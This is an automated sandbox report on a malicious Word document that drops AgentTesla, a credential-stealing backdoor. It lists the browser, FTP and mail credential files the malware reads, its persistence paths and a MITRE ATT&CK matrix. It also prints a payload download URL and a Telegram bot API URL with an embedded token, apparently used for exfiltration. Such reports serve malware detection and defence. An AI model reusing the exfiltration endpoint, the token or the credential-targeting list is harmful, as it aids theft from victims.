Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Queries volume information: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2356104817.0000000002794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2191309843.00000000039DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2354759653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2355909914.00000000026B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CTF loader_es.exe PID: 2708, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 2505

Source: Yara match	File source: 00000015.00000002.2356104817.0000000002794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2355909914.00000000026B1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2356104817.0000000002794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2191309843.00000000039DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2354759653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2355909914.00000000026B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CTF loader_es.exe PID: 2708, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Startup Items1	Startup Items1	Disable or Modify Tools11	OS Credential Dumping2	File and Directory Discovery12	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Registry Run Keys / Startup Folder321	Access Token Manipulation1	Obfuscated Files or Information1	Input Capture11	System Information Discovery115	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Process Injection111	Timestomp1	Security Account Manager	Security Software Discovery311	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Encrypted Channel12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder321	Masquerading221	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion231	LSA Secrets	Virtualization/Sandbox Evasion231	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection111	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO5421-allignright.doc	19%	ReversingLabs	Document-Office.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\CTF loader_es.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	100%	Joe Sandbox ML
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe	19%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe	45%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	19%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	45%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\CTF loader_es.exe	19%	Metadefender		Browse
C:\Users\user\AppData\Roaming\CTF loader_es.exe	45%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	19%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	45%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-us-west-2-r-w.amazonaws.com	52.218.170.106	true	false	high
api.telegram.org	149.154.167.220	true	false	high
miolouno.s3-us-west-2.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://miolouno.s3-us-west-2.amazonaws.com/mad.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	false		high
http://investor.msn.com	CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	CTF loader_es.exe, 00000004.00000002.2180855712.00000000055E0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2109743393.0000000002080000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000005.00000003.2097243678.000000000026C000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000003.2097243678.000000000026C000.00000004.00000001.sdmp	false		high
https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/	CTF loader_es.exe, 00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	CTF loader_es.exe, 00000004.00000002.2180855712.00000000055E0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2109743393.0000000002080000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CTF loader_es.exe, 00000004.00000003.2115015992.0000000002C2D000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	CTF loader_es.exe, 00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
52.218.170.106	s3-us-west-2-r-w.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404224
Start date:	04.05.2021
Start time:	20:17:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 18m 0s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	PO5421-allignright.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.expl.evad.winDOC@43/29@17/2
EGA Information:	Failed
HDC Information:	Failed
